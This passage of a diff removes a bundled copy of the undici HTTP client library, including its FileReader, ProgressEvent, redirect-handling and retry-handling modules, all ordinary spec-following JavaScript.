- readOperation(this, blob, 'Text', encoding) - } - - /** - * @see https://w3c.github.io/FileAPI/#dfn-readAsDataURL - * @param {import('buffer').Blob} blob - */ - readAsDataURL (blob) { - webidl.brandCheck(this, FileReader) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsDataURL' }) - - blob = webidl.converters.Blob(blob, { strict: false }) - - // The readAsDataURL(blob) method, when invoked, must - // initiate a read operation for blob with DataURL. - readOperation(this, blob, 'DataURL') - } - - /** - * @see https://w3c.github.io/FileAPI/#dfn-abort - */ - abort () { - // 1. If this's state is "empty" or if this's state is - // "done" set this's result to null and terminate - // this algorithm. - if (this[kState] === 'empty' || this[kState] === 'done') { - this[kResult] = null - return - } - - // 2. If this's state is "loading" set this's state to - // "done" and set this's result to null. - if (this[kState] === 'loading') { - this[kState] = 'done' - this[kResult] = null - } - - // 3. If there are any tasks from this on the file reading - // task source in an affiliated task queue, then remove - // those tasks from that task queue. - this[kAborted] = true - - // 4. Terminate the algorithm for the read method being processed. - // TODO - - // 5. Fire a progress event called abort at this. - fireAProgressEvent('abort', this) - - // 6. If this's state is not "loading", fire a progress - // event called loadend at this. 
- if (this[kState] !== 'loading') { - fireAProgressEvent('loadend', this) - } - } - - /** - * @see https://w3c.github.io/FileAPI/#dom-filereader-readystate - */ - get readyState () { - webidl.brandCheck(this, FileReader) - - switch (this[kState]) { - case 'empty': return this.EMPTY - case 'loading': return this.LOADING - case 'done': return this.DONE - } - } - - /** - * @see https://w3c.github.io/FileAPI/#dom-filereader-result - */ - get result () { - webidl.brandCheck(this, FileReader) - - // The result attribute’s getter, when invoked, must return - // this's result. - return this[kResult] - } - - /** - * @see https://w3c.github.io/FileAPI/#dom-filereader-error - */ - get error () { - webidl.brandCheck(this, FileReader) - - // The error attribute’s getter, when invoked, must return - // this's error. - return this[kError] - } - - get onloadend () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].loadend - } - - set onloadend (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].loadend) { - this.removeEventListener('loadend', this[kEvents].loadend) - } - - if (typeof fn === 'function') { - this[kEvents].loadend = fn - this.addEventListener('loadend', fn) - } else { - this[kEvents].loadend = null - } - } - - get onerror () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].error - } - - set onerror (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].error) { - this.removeEventListener('error', this[kEvents].error) - } - - if (typeof fn === 'function') { - this[kEvents].error = fn - this.addEventListener('error', fn) - } else { - this[kEvents].error = null - } - } - - get onloadstart () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].loadstart - } - - set onloadstart (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].loadstart) { - this.removeEventListener('loadstart', this[kEvents].loadstart) - } - - if (typeof fn === 'function') { - this[kEvents].loadstart = fn - 
this.addEventListener('loadstart', fn) - } else { - this[kEvents].loadstart = null - } - } - - get onprogress () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].progress - } - - set onprogress (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].progress) { - this.removeEventListener('progress', this[kEvents].progress) - } - - if (typeof fn === 'function') { - this[kEvents].progress = fn - this.addEventListener('progress', fn) - } else { - this[kEvents].progress = null - } - } - - get onload () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].load - } - - set onload (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].load) { - this.removeEventListener('load', this[kEvents].load) - } - - if (typeof fn === 'function') { - this[kEvents].load = fn - this.addEventListener('load', fn) - } else { - this[kEvents].load = null - } - } - - get onabort () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].abort - } - - set onabort (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].abort) { - this.removeEventListener('abort', this[kEvents].abort) - } - - if (typeof fn === 'function') { - this[kEvents].abort = fn - this.addEventListener('abort', fn) - } else { - this[kEvents].abort = null - } - } -} - -// https://w3c.github.io/FileAPI/#dom-filereader-empty -FileReader.EMPTY = FileReader.prototype.EMPTY = 0 -// https://w3c.github.io/FileAPI/#dom-filereader-loading -FileReader.LOADING = FileReader.prototype.LOADING = 1 -// https://w3c.github.io/FileAPI/#dom-filereader-done -FileReader.DONE = FileReader.prototype.DONE = 2 - -Object.defineProperties(FileReader.prototype, { - EMPTY: staticPropertyDescriptors, - LOADING: staticPropertyDescriptors, - DONE: staticPropertyDescriptors, - readAsArrayBuffer: kEnumerableProperty, - readAsBinaryString: kEnumerableProperty, - readAsText: kEnumerableProperty, - readAsDataURL: kEnumerableProperty, - abort: kEnumerableProperty, - readyState: 
kEnumerableProperty, - result: kEnumerableProperty, - error: kEnumerableProperty, - onloadstart: kEnumerableProperty, - onprogress: kEnumerableProperty, - onload: kEnumerableProperty, - onabort: kEnumerableProperty, - onerror: kEnumerableProperty, - onloadend: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'FileReader', - writable: false, - enumerable: false, - configurable: true - } -}) - -Object.defineProperties(FileReader, { - EMPTY: staticPropertyDescriptors, - LOADING: staticPropertyDescriptors, - DONE: staticPropertyDescriptors -}) - -module.exports = { - FileReader -} - - -/***/ }), - -/***/ 5504: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { webidl } = __nccwpck_require__(1744) - -const kState = Symbol('ProgressEvent state') - -/** - * @see https://xhr.spec.whatwg.org/#progressevent - */ -class ProgressEvent extends Event { - constructor (type, eventInitDict = {}) { - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.ProgressEventInit(eventInitDict ?? 
{}) - - super(type, eventInitDict) - - this[kState] = { - lengthComputable: eventInitDict.lengthComputable, - loaded: eventInitDict.loaded, - total: eventInitDict.total - } - } - - get lengthComputable () { - webidl.brandCheck(this, ProgressEvent) - - return this[kState].lengthComputable - } - - get loaded () { - webidl.brandCheck(this, ProgressEvent) - - return this[kState].loaded - } - - get total () { - webidl.brandCheck(this, ProgressEvent) - - return this[kState].total - } -} - -webidl.converters.ProgressEventInit = webidl.dictionaryConverter([ - { - key: 'lengthComputable', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'loaded', - converter: webidl.converters['unsigned long long'], - defaultValue: 0 - }, - { - key: 'total', - converter: webidl.converters['unsigned long long'], - defaultValue: 0 - }, - { - key: 'bubbles', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'cancelable', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'composed', - converter: webidl.converters.boolean, - defaultValue: false - } -]) - -module.exports = { - ProgressEvent -} - - -/***/ }), - -/***/ 9054: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kState: Symbol('FileReader state'), - kResult: Symbol('FileReader result'), - kError: Symbol('FileReader error'), - kLastProgressEventFired: Symbol('FileReader last progress event fired timestamp'), - kEvents: Symbol('FileReader events'), - kAborted: Symbol('FileReader aborted') -} - - -/***/ }), - -/***/ 7530: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - kState, - kError, - kResult, - kAborted, - kLastProgressEventFired -} = __nccwpck_require__(9054) -const { ProgressEvent } = __nccwpck_require__(5504) -const { getEncoding } = __nccwpck_require__(4854) -const { DOMException } = __nccwpck_require__(1037) -const { serializeAMimeType, parseMIMEType } = __nccwpck_require__(685) 
-const { types } = __nccwpck_require__(3837) -const { StringDecoder } = __nccwpck_require__(1576) -const { btoa } = __nccwpck_require__(4300) - -/** @type {PropertyDescriptor} */ -const staticPropertyDescriptors = { - enumerable: true, - writable: false, - configurable: false -} - -/** - * @see https://w3c.github.io/FileAPI/#readOperation - * @param {import('./filereader').FileReader} fr - * @param {import('buffer').Blob} blob - * @param {string} type - * @param {string?} encodingName - */ -function readOperation (fr, blob, type, encodingName) { - // 1. If fr’s state is "loading", throw an InvalidStateError - // DOMException. - if (fr[kState] === 'loading') { - throw new DOMException('Invalid state', 'InvalidStateError') - } - - // 2. Set fr’s state to "loading". - fr[kState] = 'loading' - - // 3. Set fr’s result to null. - fr[kResult] = null - - // 4. Set fr’s error to null. - fr[kError] = null - - // 5. Let stream be the result of calling get stream on blob. - /** @type {import('stream/web').ReadableStream} */ - const stream = blob.stream() - - // 6. Let reader be the result of getting a reader from stream. - const reader = stream.getReader() - - // 7. Let bytes be an empty byte sequence. - /** @type {Uint8Array[]} */ - const bytes = [] - - // 8. Let chunkPromise be the result of reading a chunk from - // stream with reader. - let chunkPromise = reader.read() - - // 9. Let isFirstChunk be true. - let isFirstChunk = true - - // 10. In parallel, while true: - // Note: "In parallel" just means non-blocking - // Note 2: readOperation itself cannot be async as double - // reading the body would then reject the promise, instead - // of throwing an error. - ;(async () => { - while (!fr[kAborted]) { - // 1. Wait for chunkPromise to be fulfilled or rejected. - try { - const { done, value } = await chunkPromise - - // 2. If chunkPromise is fulfilled, and isFirstChunk is - // true, queue a task to fire a progress event called - // loadstart at fr. 
- if (isFirstChunk && !fr[kAborted]) { - queueMicrotask(() => { - fireAProgressEvent('loadstart', fr) - }) - } - - // 3. Set isFirstChunk to false. - isFirstChunk = false - - // 4. If chunkPromise is fulfilled with an object whose - // done property is false and whose value property is - // a Uint8Array object, run these steps: - if (!done && types.isUint8Array(value)) { - // 1. Let bs be the byte sequence represented by the - // Uint8Array object. - - // 2. Append bs to bytes. - bytes.push(value) - - // 3. If roughly 50ms have passed since these steps - // were last invoked, queue a task to fire a - // progress event called progress at fr. - if ( - ( - fr[kLastProgressEventFired] === undefined || - Date.now() - fr[kLastProgressEventFired] >= 50 - ) && - !fr[kAborted] - ) { - fr[kLastProgressEventFired] = Date.now() - queueMicrotask(() => { - fireAProgressEvent('progress', fr) - }) - } - - // 4. Set chunkPromise to the result of reading a - // chunk from stream with reader. - chunkPromise = reader.read() - } else if (done) { - // 5. Otherwise, if chunkPromise is fulfilled with an - // object whose done property is true, queue a task - // to run the following steps and abort this algorithm: - queueMicrotask(() => { - // 1. Set fr’s state to "done". - fr[kState] = 'done' - - // 2. Let result be the result of package data given - // bytes, type, blob’s type, and encodingName. - try { - const result = packageData(bytes, type, blob.type, encodingName) - - // 4. Else: - - if (fr[kAborted]) { - return - } - - // 1. Set fr’s result to result. - fr[kResult] = result - - // 2. Fire a progress event called load at the fr. - fireAProgressEvent('load', fr) - } catch (error) { - // 3. If package data threw an exception error: - - // 1. Set fr’s error to error. - fr[kError] = error - - // 2. Fire a progress event called error at fr. - fireAProgressEvent('error', fr) - } - - // 5. If fr’s state is not "loading", fire a progress - // event called loadend at the fr. 
- if (fr[kState] !== 'loading') { - fireAProgressEvent('loadend', fr) - } - }) - - break - } - } catch (error) { - if (fr[kAborted]) { - return - } - - // 6. Otherwise, if chunkPromise is rejected with an - // error error, queue a task to run the following - // steps and abort this algorithm: - queueMicrotask(() => { - // 1. Set fr’s state to "done". - fr[kState] = 'done' - - // 2. Set fr’s error to error. - fr[kError] = error - - // 3. Fire a progress event called error at fr. - fireAProgressEvent('error', fr) - - // 4. If fr’s state is not "loading", fire a progress - // event called loadend at fr. - if (fr[kState] !== 'loading') { - fireAProgressEvent('loadend', fr) - } - }) - - break - } - } - })() -} - -/** - * @see https://w3c.github.io/FileAPI/#fire-a-progress-event - * @see https://dom.spec.whatwg.org/#concept-event-fire - * @param {string} e The name of the event - * @param {import('./filereader').FileReader} reader - */ -function fireAProgressEvent (e, reader) { - // The progress event e does not bubble. e.bubbles must be false - // The progress event e is NOT cancelable. e.cancelable must be false - const event = new ProgressEvent(e, { - bubbles: false, - cancelable: false - }) - - reader.dispatchEvent(event) -} - -/** - * @see https://w3c.github.io/FileAPI/#blob-package-data - * @param {Uint8Array[]} bytes - * @param {string} type - * @param {string?} mimeType - * @param {string?} encodingName - */ -function packageData (bytes, type, mimeType, encodingName) { - // 1. A Blob has an associated package data algorithm, given - // bytes, a type, a optional mimeType, and a optional - // encodingName, which switches on type and runs the - // associated steps: - - switch (type) { - case 'DataURL': { - // 1. Return bytes as a DataURL [RFC2397] subject to - // the considerations below: - // * Use mimeType as part of the Data URL if it is - // available in keeping with the Data URL - // specification [RFC2397]. 
- // * If mimeType is not available return a Data URL - // without a media-type. [RFC2397]. - - // https://datatracker.ietf.org/doc/html/rfc2397#section-3 - // dataurl := "data:" [ mediatype ] [ ";base64" ] "," data - // mediatype := [ type "/" subtype ] *( ";" parameter ) - // data := *urlchar - // parameter := attribute "=" value - let dataURL = 'data:' - - const parsed = parseMIMEType(mimeType || 'application/octet-stream') - - if (parsed !== 'failure') { - dataURL += serializeAMimeType(parsed) - } - - dataURL += ';base64,' - - const decoder = new StringDecoder('latin1') - - for (const chunk of bytes) { - dataURL += btoa(decoder.write(chunk)) - } - - dataURL += btoa(decoder.end()) - - return dataURL - } - case 'Text': { - // 1. Let encoding be failure - let encoding = 'failure' - - // 2. If the encodingName is present, set encoding to the - // result of getting an encoding from encodingName. - if (encodingName) { - encoding = getEncoding(encodingName) - } - - // 3. If encoding is failure, and mimeType is present: - if (encoding === 'failure' && mimeType) { - // 1. Let type be the result of parse a MIME type - // given mimeType. - const type = parseMIMEType(mimeType) - - // 2. If type is not failure, set encoding to the result - // of getting an encoding from type’s parameters["charset"]. - if (type !== 'failure') { - encoding = getEncoding(type.parameters.get('charset')) - } - } - - // 4. If encoding is failure, then set encoding to UTF-8. - if (encoding === 'failure') { - encoding = 'UTF-8' - } - - // 5. Decode bytes using fallback encoding encoding, and - // return the result. - return decode(bytes, encoding) - } - case 'ArrayBuffer': { - // Return a new ArrayBuffer whose contents are bytes. - const sequence = combineByteSequences(bytes) - - return sequence.buffer - } - case 'BinaryString': { - // Return bytes as a binary string, in which every byte - // is represented by a code unit of equal value [0..255]. 
- let binaryString = '' - - const decoder = new StringDecoder('latin1') - - for (const chunk of bytes) { - binaryString += decoder.write(chunk) - } - - binaryString += decoder.end() - - return binaryString - } - } -} - -/** - * @see https://encoding.spec.whatwg.org/#decode - * @param {Uint8Array[]} ioQueue - * @param {string} encoding - */ -function decode (ioQueue, encoding) { - const bytes = combineByteSequences(ioQueue) - - // 1. Let BOMEncoding be the result of BOM sniffing ioQueue. - const BOMEncoding = BOMSniffing(bytes) - - let slice = 0 - - // 2. If BOMEncoding is non-null: - if (BOMEncoding !== null) { - // 1. Set encoding to BOMEncoding. - encoding = BOMEncoding - - // 2. Read three bytes from ioQueue, if BOMEncoding is - // UTF-8; otherwise read two bytes. - // (Do nothing with those bytes.) - slice = BOMEncoding === 'UTF-8' ? 3 : 2 - } - - // 3. Process a queue with an instance of encoding’s - // decoder, ioQueue, output, and "replacement". - - // 4. Return output. - - const sliced = bytes.slice(slice) - return new TextDecoder(encoding).decode(sliced) -} - -/** - * @see https://encoding.spec.whatwg.org/#bom-sniff - * @param {Uint8Array} ioQueue - */ -function BOMSniffing (ioQueue) { - // 1. Let BOM be the result of peeking 3 bytes from ioQueue, - // converted to a byte sequence. - const [a, b, c] = ioQueue - - // 2. For each of the rows in the table below, starting with - // the first one and going down, if BOM starts with the - // bytes given in the first column, then return the - // encoding given in the cell in the second column of that - // row. Otherwise, return null. 
- if (a === 0xEF && b === 0xBB && c === 0xBF) { - return 'UTF-8' - } else if (a === 0xFE && b === 0xFF) { - return 'UTF-16BE' - } else if (a === 0xFF && b === 0xFE) { - return 'UTF-16LE' - } - - return null -} - -/** - * @param {Uint8Array[]} sequences - */ -function combineByteSequences (sequences) { - const size = sequences.reduce((a, b) => { - return a + b.byteLength - }, 0) - - let offset = 0 - - return sequences.reduce((a, b) => { - a.set(b, offset) - offset += b.byteLength - return a - }, new Uint8Array(size)) -} - -module.exports = { - staticPropertyDescriptors, - readOperation, - fireAProgressEvent -} - - -/***/ }), - -/***/ 1892: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -// We include a version number for the Dispatcher API. In case of breaking changes, -// this version number must be increased to avoid conflicts. -const globalDispatcher = Symbol.for('undici.globalDispatcher.1') -const { InvalidArgumentError } = __nccwpck_require__(8045) -const Agent = __nccwpck_require__(7890) - -if (getGlobalDispatcher() === undefined) { - setGlobalDispatcher(new Agent()) -} - -function setGlobalDispatcher (agent) { - if (!agent || typeof agent.dispatch !== 'function') { - throw new InvalidArgumentError('Argument agent must implement Agent') - } - Object.defineProperty(globalThis, globalDispatcher, { - value: agent, - writable: true, - enumerable: false, - configurable: false - }) -} - -function getGlobalDispatcher () { - return globalThis[globalDispatcher] -} - -module.exports = { - setGlobalDispatcher, - getGlobalDispatcher -} - - -/***/ }), - -/***/ 6930: -/***/ ((module) => { - -"use strict"; - - -module.exports = class DecoratorHandler { - constructor (handler) { - this.handler = handler - } - - onConnect (...args) { - return this.handler.onConnect(...args) - } - - onError (...args) { - return this.handler.onError(...args) - } - - onUpgrade (...args) { - return this.handler.onUpgrade(...args) - } - - onHeaders 
(...args) { - return this.handler.onHeaders(...args) - } - - onData (...args) { - return this.handler.onData(...args) - } - - onComplete (...args) { - return this.handler.onComplete(...args) - } - - onBodySent (...args) { - return this.handler.onBodySent(...args) - } -} - - -/***/ }), - -/***/ 2860: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const util = __nccwpck_require__(3983) -const { kBodyUsed } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { InvalidArgumentError } = __nccwpck_require__(8045) -const EE = __nccwpck_require__(2361) - -const redirectableStatusCodes = [300, 301, 302, 303, 307, 308] - -const kBody = Symbol('body') - -class BodyAsyncIterable { - constructor (body) { - this[kBody] = body - this[kBodyUsed] = false - } - - async * [Symbol.asyncIterator] () { - assert(!this[kBodyUsed], 'disturbed') - this[kBodyUsed] = true - yield * this[kBody] - } -} - -class RedirectHandler { - constructor (dispatch, maxRedirections, opts, handler) { - if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { - throw new InvalidArgumentError('maxRedirections must be a positive number') - } - - util.validateHandler(handler, opts.method, opts.upgrade) - - this.dispatch = dispatch - this.location = null - this.abort = null - this.opts = { ...opts, maxRedirections: 0 } // opts must be a copy - this.maxRedirections = maxRedirections - this.handler = handler - this.history = [] - - if (util.isStream(this.opts.body)) { - // TODO (fix): Provide some way for the user to cache the file to e.g. /tmp - // so that it can be dispatched again? - // TODO (fix): Do we need 100-expect support to provide a way to do this properly? 
- if (util.bodyLength(this.opts.body) === 0) { - this.opts.body - .on('data', function () { - assert(false) - }) - } - - if (typeof this.opts.body.readableDidRead !== 'boolean') { - this.opts.body[kBodyUsed] = false - EE.prototype.on.call(this.opts.body, 'data', function () { - this[kBodyUsed] = true - }) - } - } else if (this.opts.body && typeof this.opts.body.pipeTo === 'function') { - // TODO (fix): We can't access ReadableStream internal state - // to determine whether or not it has been disturbed. This is just - // a workaround. - this.opts.body = new BodyAsyncIterable(this.opts.body) - } else if ( - this.opts.body && - typeof this.opts.body !== 'string' && - !ArrayBuffer.isView(this.opts.body) && - util.isIterable(this.opts.body) - ) { - // TODO: Should we allow re-using iterable if !this.opts.idempotent - // or through some other flag? - this.opts.body = new BodyAsyncIterable(this.opts.body) - } - } - - onConnect (abort) { - this.abort = abort - this.handler.onConnect(abort, { history: this.history }) - } - - onUpgrade (statusCode, headers, socket) { - this.handler.onUpgrade(statusCode, headers, socket) - } - - onError (error) { - this.handler.onError(error) - } - - onHeaders (statusCode, headers, resume, statusText) { - this.location = this.history.length >= this.maxRedirections || util.isDisturbed(this.opts.body) - ? null - : parseLocation(statusCode, headers) - - if (this.opts.origin) { - this.history.push(new URL(this.opts.path, this.opts.origin)) - } - - if (!this.location) { - return this.handler.onHeaders(statusCode, headers, resume, statusText) - } - - const { origin, pathname, search } = util.parseURL(new URL(this.location, this.opts.origin && new URL(this.opts.path, this.opts.origin))) - const path = search ? `${pathname}${search}` : pathname - - // Remove headers referring to the original URL. - // By default it is Host only, unless it's a 303 (see below), which removes also all Content-* headers. 
- // https://tools.ietf.org/html/rfc7231#section-6.4 - this.opts.headers = cleanRequestHeaders(this.opts.headers, statusCode === 303, this.opts.origin !== origin) - this.opts.path = path - this.opts.origin = origin - this.opts.maxRedirections = 0 - this.opts.query = null - - // https://tools.ietf.org/html/rfc7231#section-6.4.4 - // In case of HTTP 303, always replace method to be either HEAD or GET - if (statusCode === 303 && this.opts.method !== 'HEAD') { - this.opts.method = 'GET' - this.opts.body = null - } - } - - onData (chunk) { - if (this.location) { - /* - https://tools.ietf.org/html/rfc7231#section-6.4 - - TLDR: undici always ignores 3xx response bodies. - - Redirection is used to serve the requested resource from another URL, so it is assumes that - no body is generated (and thus can be ignored). Even though generating a body is not prohibited. - - For status 301, 302, 303, 307 and 308 (the latter from RFC 7238), the specs mention that the body usually - (which means it's optional and not mandated) contain just an hyperlink to the value of - the Location response header, so the body can be ignored safely. - - For status 300, which is "Multiple Choices", the spec mentions both generating a Location - response header AND a response body with the other possible location to follow. - Since the spec explicitily chooses not to specify a format for such body and leave it to - servers and browsers implementors, we ignore the body as there is no specified way to eventually parse it. - */ - } else { - return this.handler.onData(chunk) - } - } - - onComplete (trailers) { - if (this.location) { - /* - https://tools.ietf.org/html/rfc7231#section-6.4 - - TLDR: undici always ignores 3xx response trailers as they are not expected in case of redirections - and neither are useful if present. - - See comment on onData method above for more detailed informations. 
- */ - - this.location = null - this.abort = null - - this.dispatch(this.opts, this) - } else { - this.handler.onComplete(trailers) - } - } - - onBodySent (chunk) { - if (this.handler.onBodySent) { - this.handler.onBodySent(chunk) - } - } -} - -function parseLocation (statusCode, headers) { - if (redirectableStatusCodes.indexOf(statusCode) === -1) { - return null - } - - for (let i = 0; i < headers.length; i += 2) { - if (headers[i].toString().toLowerCase() === 'location') { - return headers[i + 1] - } - } -} - -// https://tools.ietf.org/html/rfc7231#section-6.4.4 -function shouldRemoveHeader (header, removeContent, unknownOrigin) { - return ( - (header.length === 4 && header.toString().toLowerCase() === 'host') || - (removeContent && header.toString().toLowerCase().indexOf('content-') === 0) || - (unknownOrigin && header.length === 13 && header.toString().toLowerCase() === 'authorization') || - (unknownOrigin && header.length === 6 && header.toString().toLowerCase() === 'cookie') - ) -} - -// https://tools.ietf.org/html/rfc7231#section-6.4 -function cleanRequestHeaders (headers, removeContent, unknownOrigin) { - const ret = [] - if (Array.isArray(headers)) { - for (let i = 0; i < headers.length; i += 2) { - if (!shouldRemoveHeader(headers[i], removeContent, unknownOrigin)) { - ret.push(headers[i], headers[i + 1]) - } - } - } else if (headers && typeof headers === 'object') { - for (const key of Object.keys(headers)) { - if (!shouldRemoveHeader(key, removeContent, unknownOrigin)) { - ret.push(key, headers[key]) - } - } - } else { - assert(headers == null, 'headers must be an object or an array') - } - return ret -} - -module.exports = RedirectHandler - - -/***/ }), - -/***/ 2286: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const assert = __nccwpck_require__(9491) - -const { kRetryHandlerDefaultRetry } = __nccwpck_require__(2785) -const { RequestRetryError } = __nccwpck_require__(8045) -const { isDisturbed, parseHeaders, parseRangeHeader 
} = __nccwpck_require__(3983) - -function calculateRetryAfterHeader (retryAfter) { - const current = Date.now() - const diff = new Date(retryAfter).getTime() - current - - return diff -} - -class RetryHandler { - constructor (opts, handlers) { - const { retryOptions, ...dispatchOpts } = opts - const { - // Retry scoped - retry: retryFn, - maxRetries, - maxTimeout, - minTimeout, - timeoutFactor, - // Response scoped - methods, - errorCodes, - retryAfter, - statusCodes - } = retryOptions ?? {} - - this.dispatch = handlers.dispatch - this.handler = handlers.handler - this.opts = dispatchOpts - this.abort = null - this.aborted = false - this.retryOpts = { - retry: retryFn ?? RetryHandler[kRetryHandlerDefaultRetry], - retryAfter: retryAfter ?? true, - maxTimeout: maxTimeout ?? 30 * 1000, // 30s, - timeout: minTimeout ?? 500, // .5s - timeoutFactor: timeoutFactor ?? 2, - maxRetries: maxRetries ?? 5, - // What errors we should retry - methods: methods ?? ['GET', 'HEAD', 'OPTIONS', 'PUT', 'DELETE', 'TRACE'], - // Indicates which errors to retry - statusCodes: statusCodes ?? [500, 502, 503, 504, 429], - // List of errors to retry - errorCodes: errorCodes ?? 
[ - 'ECONNRESET', - 'ECONNREFUSED', - 'ENOTFOUND', - 'ENETDOWN', - 'ENETUNREACH', - 'EHOSTDOWN', - 'EHOSTUNREACH', - 'EPIPE' - ] - } - - this.retryCount = 0 - this.start = 0 - this.end = null - this.etag = null - this.resume = null - - // Handle possible onConnect duplication - this.handler.onConnect(reason => { - this.aborted = true - if (this.abort) { - this.abort(reason) - } else { - this.reason = reason - } - }) - } - - onRequestSent () { - if (this.handler.onRequestSent) { - this.handler.onRequestSent() - } - } - - onUpgrade (statusCode, headers, socket) { - if (this.handler.onUpgrade) { - this.handler.onUpgrade(statusCode, headers, socket) - } - } - - onConnect (abort) { - if (this.aborted) { - abort(this.reason) - } else { - this.abort = abort - } - } - - onBodySent (chunk) { - if (this.handler.onBodySent) return this.handler.onBodySent(chunk) - } - - static [kRetryHandlerDefaultRetry] (err, { state, opts }, cb) { - const { statusCode, code, headers } = err - const { method, retryOptions } = opts - const { - maxRetries, - timeout, - maxTimeout, - timeoutFactor, - statusCodes, - errorCodes, - methods - } = retryOptions - let { counter, currentTimeout } = state - - currentTimeout = - currentTimeout != null && currentTimeout > 0 ? 
currentTimeout : timeout - - // Any code that is not a Undici's originated and allowed to retry - if ( - code && - code !== 'UND_ERR_REQ_RETRY' && - code !== 'UND_ERR_SOCKET' && - !errorCodes.includes(code) - ) { - cb(err) - return - } - - // If a set of method are provided and the current method is not in the list - if (Array.isArray(methods) && !methods.includes(method)) { - cb(err) - return - } - - // If a set of status code are provided and the current status code is not in the list - if ( - statusCode != null && - Array.isArray(statusCodes) && - !statusCodes.includes(statusCode) - ) { - cb(err) - return - } - - // If we reached the max number of retries - if (counter > maxRetries) { - cb(err) - return - } - - let retryAfterHeader = headers != null && headers['retry-after'] - if (retryAfterHeader) { - retryAfterHeader = Number(retryAfterHeader) - retryAfterHeader = isNaN(retryAfterHeader) - ? calculateRetryAfterHeader(retryAfterHeader) - : retryAfterHeader * 1e3 // Retry-After is in seconds - } - - const retryTimeout = - retryAfterHeader > 0 - ? 
Math.min(retryAfterHeader, maxTimeout) - : Math.min(currentTimeout * timeoutFactor ** counter, maxTimeout) - - state.currentTimeout = retryTimeout - - setTimeout(() => cb(null), retryTimeout) - } - - onHeaders (statusCode, rawHeaders, resume, statusMessage) { - const headers = parseHeaders(rawHeaders) - - this.retryCount += 1 - - if (statusCode >= 300) { - this.abort( - new RequestRetryError('Request failed', statusCode, { - headers, - count: this.retryCount - }) - ) - return false - } - - // Checkpoint for resume from where we left it - if (this.resume != null) { - this.resume = null - - if (statusCode !== 206) { - return true - } - - const contentRange = parseRangeHeader(headers['content-range']) - // If no content range - if (!contentRange) { - this.abort( - new RequestRetryError('Content-Range mismatch', statusCode, { - headers, - count: this.retryCount - }) - ) - return false - } - - // Let's start with a weak etag check - if (this.etag != null && this.etag !== headers.etag) { - this.abort( - new RequestRetryError('ETag mismatch', statusCode, { - headers, - count: this.retryCount - }) - ) - return false - } - - const { start, size, end = size } = contentRange - - assert(this.start === start, 'content-range mismatch') - assert(this.end == null || this.end === end, 'content-range mismatch') - - this.resume = resume - return true - } - - if (this.end == null) { - if (statusCode === 206) { - // First time we receive 206 - const range = parseRangeHeader(headers['content-range']) - - if (range == null) { - return this.handler.onHeaders( - statusCode, - rawHeaders, - resume, - statusMessage - ) - } - - const { start, size, end = size } = range - - assert( - start != null && Number.isFinite(start) && this.start !== start, - 'content-range mismatch' - ) - assert(Number.isFinite(start)) - assert( - end != null && Number.isFinite(end) && this.end !== end, - 'invalid content-length' - ) - - this.start = start - this.end = end - } - - // We make our best to checkpoint the 
body for further range headers - if (this.end == null) { - const contentLength = headers['content-length'] - this.end = contentLength != null ? Number(contentLength) : null - } - - assert(Number.isFinite(this.start)) - assert( - this.end == null || Number.isFinite(this.end), - 'invalid content-length' - ) - - this.resume = resume - this.etag = headers.etag != null ? headers.etag : null - - return this.handler.onHeaders( - statusCode, - rawHeaders, - resume, - statusMessage - ) - } - - const err = new RequestRetryError('Request failed', statusCode, { - headers, - count: this.retryCount - }) - - this.abort(err) - - return false - } - - onData (chunk) { - this.start += chunk.length - - return this.handler.onData(chunk) - } - - onComplete (rawTrailers) { - this.retryCount = 0 - return this.handler.onComplete(rawTrailers) - } - - onError (err) { - if (this.aborted || isDisturbed(this.opts.body)) { - return this.handler.onError(err) - } - - this.retryOpts.retry( - err, - { - state: { counter: this.retryCount++, currentTimeout: this.retryAfter }, - opts: { retryOptions: this.retryOpts, ...this.opts } - }, - onRetry.bind(this) - ) - - function onRetry (err) { - if (err != null || this.aborted || isDisturbed(this.opts.body)) { - return this.handler.onError(err) - } - - if (this.start !== 0) { - this.opts = { - ...this.opts, - headers: { - ...this.opts.headers, - range: `bytes=${this.start}-${this.end ?? 
